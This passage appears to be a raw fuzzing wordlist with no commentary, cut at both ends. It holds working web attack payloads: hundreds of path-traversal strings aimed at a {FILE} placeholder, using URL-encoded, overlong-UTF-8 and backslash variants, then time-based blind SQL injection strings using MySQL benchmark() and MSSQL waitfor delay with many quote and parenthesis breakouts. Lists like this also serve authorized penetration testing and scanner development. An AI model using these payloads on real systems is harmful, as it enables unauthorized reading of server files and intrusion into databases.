5c0x2e0x2e0x5c{FILE}\n/0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}\n/0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}\n/..%c0%2f{FILE}\n/..%c0%2f..%c0%2f{FILE}\n/..%c0%2f..%c0%2f..%c0%2f{FILE}\n/..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}\n/..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}\n/..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}\n/..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}\n/..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}\n/%c0%2e%c0%2e/{FILE}\n/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}\n/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}\n/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}\n/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}\n/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}\n/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}\n/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}\n/%c0%2e%c0%2e%c0%2f{FILE}\n/%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}\n/%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}\n/%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}\n/%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}\n/%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}\n/%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}\n/%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}\n/..%c0%5c{FILE}\n/..%c0%5c..%c0%5c{FILE}\n/..%c0%5c..%c0%5c..%c0%5c{FILE}\n/..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}\n/..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}\n/..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}\n/..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}\n/..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}\n/%c0%2e%c0%2e\\{FILE}\n/%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}\n/%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}\n/%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}\n/%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}\n/%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}\n/%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}\n/%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}\n/%c0%2e%c0%2e%c0%5c{FILE}\n/%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}\n/%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}\n/%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}\n/%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}\n/%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}\n/%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}\n/%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}\n////%2e%2e%2f{FILE}\n////%2e%2e%2f%2e%2e%2f{FILE}\n////%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}\n////%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}\n////%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}\n////%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}\n////%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}\n////%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}\n/\\\\\\%2e%2e%5c{FILE}\n/\\\\\\%2e%2e%5c%2e%2e%5c{FILE}\n/\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}\n/\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}\n/\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}\n/\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}\n/\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}\n/\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}\n/..//{FILE}\n/..//..//{FILE}\n/..//..//..//{FILE}\n/..//..//..//..//{FILE}\n/..//..//..//..//..//{FILE}\n/..//..//..//..//..//..//{FILE}\n/..//..//..//..//..//..//..//{FILE}\n/..//..//..//..//..//..//..//..//{FILE}\n/..///{FILE}\n/..///..///{FILE}\n/..///..///..///{FILE}\n/..///..///..///..///{FILE}\n/..///..///..///..///..///{FILE}\n/..///..///..///..///..///..///{FILE}\n/..///..///..///..///..///..///..///{FILE}\n/..///..///..///..///..///..///..///..///{FILE}\n/..\\\\{FILE}\n/..\\\\..\\\\{FILE}\n/..\\\\..\\\\..\\\\{FILE}\n/..\\\\..\\\\..\\\\..\\\\{FILE}\n/..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}\n/..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}\n/..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}\n/..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}\n/..\\\\\\{FILE}\n/..\\\\\\..\\\\\\{FILE}\n/..\\\\\\..\\\\\\..\\\\\\{FILE}\n/..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}\n/..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}\n/..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}\n/..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}\n/..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}\n/./\\/./{FILE}\n/./\\/././\\/./{FILE}\n/./\\/././\\/././\\/./{FILE}\n/./\\/././\\/././\\/././\\/./{FILE}\n/./\\/././\\/././\\/././\\/././\\/./{FILE}\n/./\\/././\\/././\\/././\\/././\\/././\\/./{FILE}\n/./\\/././\\/././\\/././\\/././\\/././\\/././\\/./{FILE}\n/./\\/././\\/././\\/././\\/././\\/././\\/././\\/././\\/./{FILE}\n/.\\/\\.\\{FILE}\n/.\\/\\.\\.\\/\\.\\{FILE}\n/.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}\n/.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}\n/.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}\n/.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}\n/.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}\n/.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}\n/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../{FILE}\n/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../{FILE}\n/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../{FILE}\n/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../{FILE}\n/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../{FILE}\n/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../{FILE}\n/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../{FILE}\n/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../{FILE}\n/.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\{FILE}\n/.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\{FILE}\n/.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\{FILE}\n/.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\{FILE}\n/.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\{FILE}\n/.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\{FILE}\n/.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\..\\{FILE}\n/.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\..\\..\\{FILE}\n/./../{FILE}\n/./.././../{FILE}\n/./.././.././../{FILE}\n/./.././.././.././../{FILE}\n/./.././.././.././.././../{FILE}\n/./.././.././.././.././.././../{FILE}\n/./.././.././.././.././.././.././../{FILE}\n/./.././.././.././.././.././.././.././../{FILE}\n/.\\..\\{FILE}\n/.\\..\\.\\..\\{FILE}\n/.\\..\\.\\..\\.\\..\\{FILE}\n/.\\..\\.\\..\\.\\..\\.\\..\\{FILE}\n/.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}\n/.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}\n/.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}\n/.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}\n/.//..//{FILE}\n/.//..//.//..//{FILE}\n/.//..//.//..//.//..//{FILE}\n/.//..//.//..//.//..//.//..//{FILE}\n/.//..//.//..//.//..//.//..//.//..//{FILE}\n/.//..//.//..//.//..//.//..//.//..//.//..//{FILE}\n/.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}\n/.//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}\n/.\\\\..\\\\{FILE}\n/.\\\\..\\\\.\\\\..\\\\{FILE}\n/.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}\n/.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}\n/.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}\n/.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}\n/.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}\n/.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}\n/../{FILE}\n/../..//{FILE}\n/../..//../{FILE}\n/../..//../..//{FILE}\n/../..//../..//../{FILE}\n/../..//../..//../..//{FILE}\n/../..//../..//../..//../{FILE}\n/../..//../..//../..//../..//{FILE}\n/..\\{FILE}\n/..\\..\\\\{FILE}\n/..\\..\\\\..\\{FILE}\n/..\\..\\\\..\\..\\\\{FILE}\n/..\\..\\\\..\\..\\\\..\\{FILE}\n/..\\..\\\\..\\..\\\\..\\..\\\\{FILE}\n/..\\..\\\\..\\..\\\\..\\..\\\\..\\{FILE}\n/..\\..\\\\..\\..\\\\..\\..\\\\..\\..\\\\{FILE}\n/..///{FILE}\n/../..///{FILE}\n/../..//..///{FILE}\n/../..//../..///{FILE}\n/../..//../..//..///{FILE}\n/../..//../..//../..///{FILE}\n/../..//../..//../..//..///{FILE}\n/../..//../..//../..//../..///{FILE}\n/..\\\\\\{FILE}\n/..\\..\\\\\\{FILE}\n/..\\..\\\\..\\\\\\{FILE}\n/..\\..\\\\..\\..\\\\\\{FILE}\n/..\\..\\\\..\\..\\\\..\\\\\\{FILE}\n/..\\..\\\\..\\..\\\\..\\..\\\\\\{FILE}\n/..\\..\\\\..\\..\\\\..\\..\\\\..\\\\\\{FILE}\n/..\\..\\\\..\\..\\\\..\\..\\\\..\\..\\\\\\{FILE}\n/\\..%2f\n/\\..%2f\\..%2f\n/\\..%2f\\..%2f\\..%2f\n/\\..%2f\\..%2f\\..%2f\\..%2f\n/\\..%2f\\..%2f\\..%2f\\..%2f\\..%2f\n/\\..%2f\\..%2f\\..%2f\\..%2f\\..%2f\\..%2f\n/\\..%2f\\..%2f\\..%2f\\..%2f\\..%2f\\..%2f\\..%2f\n/\\..%2f\\..%2f\\..%2f\\..%2f\\..%2f\\..%2f\\..%2f\\..%2f{FILE}\nand 0=benchmark(3000000,MD5(1))%20/*\n and 0=benchmark(3000000,MD5(1))%20--\n and 0=benchmark(3000000,MD5(1))%20%23\n' and 0=benchmark(3000000,MD5(1))%20/*\n' and 0=benchmark(3000000,MD5(1))%20--\n' and 0=benchmark(3000000,MD5(1))%20%23\n\" and 0=benchmark(3000000,MD5(1))%20/*\n\" and 0=benchmark(3000000,MD5(1))%20--\n\" and 0=benchmark(3000000,MD5(1))%20%23\n) and 0=benchmark(3000000,MD5(1))%20/*\n) and 0=benchmark(3000000,MD5(1))%20--\n) and 0=benchmark(3000000,MD5(1))%20%23\n)) and 0=benchmark(3000000,MD5(1))%20/*\n)) and 0=benchmark(3000000,MD5(1))%20--\n)) and 0=benchmark(3000000,MD5(1))%20%23\n))) and 0=benchmark(3000000,MD5(1))%20/*\n))) and 0=benchmark(3000000,MD5(1))%20--\n))) and 0=benchmark(3000000,MD5(1))%20%23\n)))) and 0=benchmark(3000000,MD5(1))%20/*\n)))) and 0=benchmark(3000000,MD5(1))%20--\n)))) and 0=benchmark(3000000,MD5(1))%20%23\n') and 0=benchmark(3000000,MD5(1))%20/*\n') and 0=benchmark(3000000,MD5(1))%20--\n') and 0=benchmark(3000000,MD5(1))%20%23\n\") and 0=benchmark(3000000,MD5(1))%20/*\n\") and 0=benchmark(3000000,MD5(1))%20--\n\") and 0=benchmark(3000000,MD5(1))%20%23\n')) and 0=benchmark(3000000,MD5(1))%20/*\n')) and 0=benchmark(3000000,MD5(1))%20--\n')) and 0=benchmark(3000000,MD5(1))%20%23\n\")) and 0=benchmark(3000000,MD5(1))%20/*\n\")) and 0=benchmark(3000000,MD5(1))%20--\n\")) and 0=benchmark(3000000,MD5(1))%20%23\n'))) and 0=benchmark(3000000,MD5(1))%20/*\n'))) and 0=benchmark(3000000,MD5(1))%20--\n'))) and 0=benchmark(3000000,MD5(1))%20%23\n\"))) and 0=benchmark(3000000,MD5(1))%20/*\n\"))) and 0=benchmark(3000000,MD5(1))%20--\n\"))) and 0=benchmark(3000000,MD5(1))%20%23\n')))) and 0=benchmark(3000000,MD5(1))%20/*\n')))) and 0=benchmark(3000000,MD5(1))%20--\n')))) and 0=benchmark(3000000,MD5(1))%20%23\n\")))) and 0=benchmark(3000000,MD5(1))%20/*\n\")))) and 0=benchmark(3000000,MD5(1))%20--\n\")))) and 0=benchmark(3000000,MD5(1))%20%23\n)%20waitfor%20delay%20'0:0:20'%20/*\n)%20waitfor%20delay%20'0:0:20'%20--\n')%20waitfor%20delay%20'0:0:20'%20/*\n')%20waitfor%20delay%20'0:0:20'%20--\n\")%20waitfor%20delay%20'0:0:20'%20/*\n\")%20waitfor%20delay%20'0:0:20'%20--\n))%20waitfor%20delay%20'0:0:20'%20/*\n))%20waitfor%20delay%20'0:0:20'%20--\n'))%20waitfor%20delay%20'0:0:20'%20/*\n'))%20waitfor%20delay%20'0:0:20'%20--\n\"))%20waitfor%20delay%20'0:0:20'%20/*\n\"))%20waitfor%20delay%20'0:0:20'%20--\n,NULL)%20waitfor%20delay%20'0:0:20'%20/*\n,NULL)%20waitfor%20delay%20'0:0:20'%20--\n',NULL)%20waifor%20delay%20'0:0:20'%20/*\n',NULL)%20waitfor%20delay%20'0:0:20'%20--\n\",NULL)%20waitfor%20delay%20'0:0:20'%20/*\n\",NULL)%20waitfor%20delay%20'0:0:20'%20--\n),NULL)%20waitfor%20delay%20'0:0:20'%20/*\n),NULL)%20waitfor%20delay%20'0:0:20'%20--\n'),NULL)%20waifor%20delay%20'0:0:20'%20/*\n'),NULL)%20waitfor%20delay%20'0:0:20'%20--\n\"),NULL)%20waitfor%20delay%20'0:0:20'%20/*\n\"),NULL)%20waitfor%20delay%20'0:0:20'%20--\n,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*\n,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--\n',NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*\n',NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--\n\",NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*\n\",NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--\n),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*\n),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--\n'),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*\n'),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--\n\"),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*\n\"),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--\n,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*\n,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--\n',NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*\n',NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--\n\",NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*\n\",NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--\n),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*\n),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--\n'),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*\n'),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--\n\"),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*\n\"),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--\n,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*\n,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--\n',NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*\n',NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--\n\",NULL,NULL,NULL,NUL